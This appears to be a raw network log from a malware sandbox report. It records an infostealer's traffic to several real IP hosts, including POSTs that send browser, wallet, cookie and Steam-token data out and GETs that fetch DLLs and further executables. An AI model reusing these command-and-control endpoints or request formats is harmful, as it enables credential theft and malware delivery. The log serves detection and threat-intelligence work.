                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIDHIIJKEBGHJJKFIDAHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 49 44 48 49 49 4a 4b 45 42 47 48 4a 4a 4b 46 49 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 61 66 33 66 63 39 34 39 38 33 33 62 34 33 34 37 35 35 37 66 32 35 61 62 61 66 30 65 61 38 33 34 39 64 32 64 37 62 61 31 35 62 62 30 33 63 64 66 39 31 32 38 63 30 31 62 66 64 63 39 61 39 61 32 34 64 37 38 37 35 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 48 49 49 4a 4b 45 42 47 48 4a 4a 4b 46 49 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 48 49 49 4a 4b 45 42 47 48 4a 4a 4b 46 49 44 41 2d 2d 0d 0a Data Ascii: ------CGIDHIIJKEBGHJJKFIDAContent-Disposition: form-data; name="token"a4af3fc949833b4347557f25abaf0ea8349d2d7ba15bb03cdf9128c01bfdc9a9a24d7875------CGIDHIIJKEBGHJJKFIDAContent-Disposition: form-data; name="message"browsers------CGIDHIIJKEBGHJJKFIDA--
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKECFIIEHCFHIECAFBAKHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 61 66 33 66 63 39 34 39 38 33 33 62 34 33 34 37 35 35 37 66 32 35 61 62 61 66 30 65 61 38 33 34 39 64 32 64 37 62 61 31 35 62 62 30 33 63 64 66 39 31 32 38 63 30 31 62 66 64 63 39 61 39 61 32 34 64 37 38 37 35 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 4b 2d 2d 0d 0a Data Ascii: ------BKECFIIEHCFHIECAFBAKContent-Disposition: form-data; name="token"a4af3fc949833b4347557f25abaf0ea8349d2d7ba15bb03cdf9128c01bfdc9a9a24d7875------BKECFIIEHCFHIECAFBAKContent-Disposition: form-data; name="message"plugins------BKECFIIEHCFHIECAFBAK--
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKFCFBFIDGCGDHJDBKFHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 44 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 61 66 33 66 63 39 34 39 38 33 33 62 34 33 34 37 35 35 37 66 32 35 61 62 61 66 30 65 61 38 33 34 39 64 32 64 37 62 61 31 35 62 62 30 33 63 64 66 39 31 32 38 63 30 31 62 66 64 63 39 61 39 61 32 34 64 37 38 37 35 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 44 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 44 42 4b 46 2d 2d 0d 0a Data Ascii: ------FBKFCFBFIDGCGDHJDBKFContent-Disposition: form-data; name="token"a4af3fc949833b4347557f25abaf0ea8349d2d7ba15bb03cdf9128c01bfdc9a9a24d7875------FBKFCFBFIDGCGDHJDBKFContent-Disposition: form-data; name="message"fplugins------FBKFCFBFIDGCGDHJDBKF--
Source: global traffic | HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----GDGHJEHJJDAAAKEBGCFC | Host: 185.215.113.206 | Content-Length: 6323 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1 | Host: 185.215.113.206 | Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIIDAKKJJJKKECAKKJEHost: 185.215.113.206Content-Length: 419Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 61 66 33 66 63 39 34 39 38 33 33 62 34 33 34 37 35 35 37 66 32 35 61 62 61 66 30 65 61 38 33 34 39 64 32 64 37 62 61 31 35 62 62 30 33 63 64 66 39 31 32 38 63 30 31 62 66 64 63 39 61 39 61 32 34 64 37 38 37 35 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 79 35 30 65 48 51 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 2d 2d 0d 0a Data Ascii: ------HIIIDAKKJJJKKECAKKJEContent-Disposition: form-data; name="token"a4af3fc949833b4347557f25abaf0ea8349d2d7ba15bb03cdf9128c01bfdc9a9a24d7875------HIIIDAKKJJJKKECAKKJEContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lXy50eHQ=------HIIIDAKKJJJKKECAKKJEContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------HIIIDAKKJJJKKECAKKJE--
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJJJKFIIIJJJECAAEHDBHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 4a 45 43 41 41 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 61 66 33 66 63 39 34 39 38 33 33 62 34 33 34 37 35 35 37 66 32 35 61 62 61 66 30 65 61 38 33 34 39 64 32 64 37 62 61 31 35 62 62 30 33 63 64 66 39 31 32 38 63 30 31 62 66 64 63 39 61 39 61 32 34 64 37 38 37 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 4a 45 43 41 41 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 4a 45 43 41 41 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 4a 45 43 41 41 45 48 44 42 2d 2d 0d 0a Data Ascii: ------KJJJKFIIIJJJECAAEHDBContent-Disposition: form-data; name="token"a4af3fc949833b4347557f25abaf0ea8349d2d7ba15bb03cdf9128c01bfdc9a9a24d7875------KJJJKFIIIJJJECAAEHDBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KJJJKFIIIJJJECAAEHDBContent-Disposition: form-data; name="file"------KJJJKFIIIJJJECAAEHDB--
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIIECAAKECFHIECBKJDHHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 61 66 33 66 63 39 34 39 38 33 33 62 34 33 34 37 35 35 37 66 32 35 61 62 61 66 30 65 61 38 33 34 39 64 32 64 37 62 61 31 35 62 62 30 33 63 64 66 39 31 32 38 63 30 31 62 66 64 63 39 61 39 61 32 34 64 37 38 37 35 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 48 2d 2d 0d 0a Data Ascii: ------IIIECAAKECFHIECBKJDHContent-Disposition: form-data; name="token"a4af3fc949833b4347557f25abaf0ea8349d2d7ba15bb03cdf9128c01bfdc9a9a24d7875------IIIECAAKECFHIECBKJDHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IIIECAAKECFHIECBKJDHContent-Disposition: form-data; name="file"------IIIECAAKECFHIECBKJDH--
Source: global traffic | HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1 | Host: 185.215.113.206 | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1 | Host: 185.215.113.206 | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1 | Host: 185.215.113.206 | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1 | Host: 185.215.113.206 | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1 | Host: 185.215.113.206 | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1 | Host: 185.215.113.206 | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----KKFCAAKFBAEHJJJJDHIE | Host: 185.215.113.206 | Content-Length: 947 | Connection: Keep-Alive | Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGDGCFBAEGDHJKEBGCBAHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 61 66 33 66 63 39 34 39 38 33 33 62 34 33 34 37 35 35 37 66 32 35 61 62 61 66 30 65 61 38 33 34 39 64 32 64 37 62 61 31 35 62 62 30 33 63 64 66 39 31 32 38 63 30 31 62 66 64 63 39 61 39 61 32 34 64 37 38 37 35 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 2d 2d 0d 0a Data Ascii: ------CGDGCFBAEGDHJKEBGCBAContent-Disposition: form-data; name="token"a4af3fc949833b4347557f25abaf0ea8349d2d7ba15bb03cdf9128c01bfdc9a9a24d7875------CGDGCFBAEGDHJKEBGCBAContent-Disposition: form-data; name="message"wallets------CGDGCFBAEGDHJKEBGCBA--
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHIDGDHCGCBAKFHIIIIIHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 49 44 47 44 48 43 47 43 42 41 4b 46 48 49 49 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 61 66 33 66 63 39 34 39 38 33 33 62 34 33 34 37 35 35 37 66 32 35 61 62 61 66 30 65 61 38 33 34 39 64 32 64 37 62 61 31 35 62 62 30 33 63 64 66 39 31 32 38 63 30 31 62 66 64 63 39 61 39 61 32 34 64 37 38 37 35 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 44 47 44 48 43 47 43 42 41 4b 46 48 49 49 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 44 47 44 48 43 47 43 42 41 4b 46 48 49 49 49 49 49 2d 2d 0d 0a Data Ascii: ------GHIDGDHCGCBAKFHIIIIIContent-Disposition: form-data; name="token"a4af3fc949833b4347557f25abaf0ea8349d2d7ba15bb03cdf9128c01bfdc9a9a24d7875------GHIDGDHCGCBAKFHIIIIIContent-Disposition: form-data; name="message"files------GHIDGDHCGCBAKFHIIIII--
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDHDHIECGCAEBFIIDHIHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 44 48 44 48 49 45 43 47 43 41 45 42 46 49 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 61 66 33 66 63 39 34 39 38 33 33 62 34 33 34 37 35 35 37 66 32 35 61 62 61 66 30 65 61 38 33 34 39 64 32 64 37 62 61 31 35 62 62 30 33 63 64 66 39 31 32 38 63 30 31 62 66 64 63 39 61 39 61 32 34 64 37 38 37 35 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 48 44 48 49 45 43 47 43 41 45 42 46 49 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 48 44 48 49 45 43 47 43 41 45 42 46 49 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 48 44 48 49 45 43 47 43 41 45 42 46 49 49 44 48 49 2d 2d 0d 0a Data Ascii: ------EHDHDHIECGCAEBFIIDHIContent-Disposition: form-data; name="token"a4af3fc949833b4347557f25abaf0ea8349d2d7ba15bb03cdf9128c01bfdc9a9a24d7875------EHDHDHIECGCAEBFIIDHIContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------EHDHDHIECGCAEBFIIDHIContent-Disposition: form-data; name="file"------EHDHDHIECGCAEBFIIDHI--
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAEHJJECAEGCAAAAEGIEHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 45 48 4a 4a 45 43 41 45 47 43 41 41 41 41 45 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 61 66 33 66 63 39 34 39 38 33 33 62 34 33 34 37 35 35 37 66 32 35 61 62 61 66 30 65 61 38 33 34 39 64 32 64 37 62 61 31 35 62 62 30 33 63 64 66 39 31 32 38 63 30 31 62 66 64 63 39 61 39 61 32 34 64 37 38 37 35 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 48 4a 4a 45 43 41 45 47 43 41 41 41 41 45 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 48 4a 4a 45 43 41 45 47 43 41 41 41 41 45 47 49 45 2d 2d 0d 0a Data Ascii: ------DAEHJJECAEGCAAAAEGIEContent-Disposition: form-data; name="token"a4af3fc949833b4347557f25abaf0ea8349d2d7ba15bb03cdf9128c01bfdc9a9a24d7875------DAEHJJECAEGCAAAAEGIEContent-Disposition: form-data; name="message"ybncbhylepme------DAEHJJECAEGCAAAAEGIE--
Source: global traffic | HTTP traffic detected: GET /mine/random.exe HTTP/1.1 | Host: 185.215.113.16 | Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHIEHJEBAAFIDHJEBGIHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 45 48 4a 45 42 41 41 46 49 44 48 4a 45 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 61 66 33 66 63 39 34 39 38 33 33 62 34 33 34 37 35 35 37 66 32 35 61 62 61 66 30 65 61 38 33 34 39 64 32 64 37 62 61 31 35 62 62 30 33 63 64 66 39 31 32 38 63 30 31 62 66 64 63 39 61 39 61 32 34 64 37 38 37 35 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 45 48 4a 45 42 41 41 46 49 44 48 4a 45 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 45 48 4a 45 42 41 41 46 49 44 48 4a 45 42 47 49 2d 2d 0d 0a Data Ascii: ------GDHIEHJEBAAFIDHJEBGIContent-Disposition: form-data; name="token"a4af3fc949833b4347557f25abaf0ea8349d2d7ba15bb03cdf9128c01bfdc9a9a24d7875------GDHIEHJEBAAFIDHJEBGIContent-Disposition: form-data; name="message"wkkjqaiaxkhb------GDHIEHJEBAAFIDHJEBGI--
Source: global traffic | HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.43 | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
Source: global traffic | HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.43 | Content-Length: 160 | Cache-Control: no-cache | Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 | Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic | HTTP traffic detected: GET /files/rhnew.exe HTTP/1.1 | Host: 31.41.244.11
Source: global traffic | HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.43 | Content-Length: 31 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 31 32 32 37 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=1012278001&unit=246122658369
Source: global traffic | HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1 | Host: 31.41.244.11
Source: global traffic | HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.43 | Content-Length: 31 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 31 32 32 37 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=1012279001&unit=246122658369
Source: global traffic | HTTP traffic detected: GET /luma/random.exe HTTP/1.1 | Host: 185.215.113.16
Source: global traffic | HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.43 | Content-Length: 31 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 31 32 32 38 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=1012280001&unit=246122658369
Source: global traffic | HTTP traffic detected: GET /steam/random.exe HTTP/1.1 | Host: 185.215.113.16
Source: global traffic | HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.43 | Content-Length: 31 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 31 32 32 38 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=1012281001&unit=246122658369
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.206 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /well/random.exe HTTP/1.1 | Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCBAECGIEBKKFHIDAKECHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 42 41 45 43 47 49 45 42 4b 4b 46 48 49 44 41 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 41 39 41 39 41 43 42 37 32 36 38 34 32 31 37 36 35 31 31 32 30 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 41 45 43 47 49 45 42 4b 4b 46 48 49 44 41 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 72 75 6d 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 41 45 43 47 49 45 42 4b 4b 46 48 49 44 41 4b 45 43 2d 2d 0d 0a Data Ascii: ------FCBAECGIEBKKFHIDAKECContent-Disposition: form-data; name="hwid"AA9A9ACB72684217651120------FCBAECGIEBKKFHIDAKECContent-Disposition: form-data; name="build"drum------FCBAECGIEBKKFHIDAKEC--
Source: global traffic | HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.43 | Content-Length: 31 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 31 32 32 38 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=1012282001&unit=246122658369
Source: global traffic | HTTP traffic detected: GET /off/random.exe HTTP/1.1 | Host: 185.215.113.16
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.206 | Connection: Keep-Alive | Cache-Control: no-cache
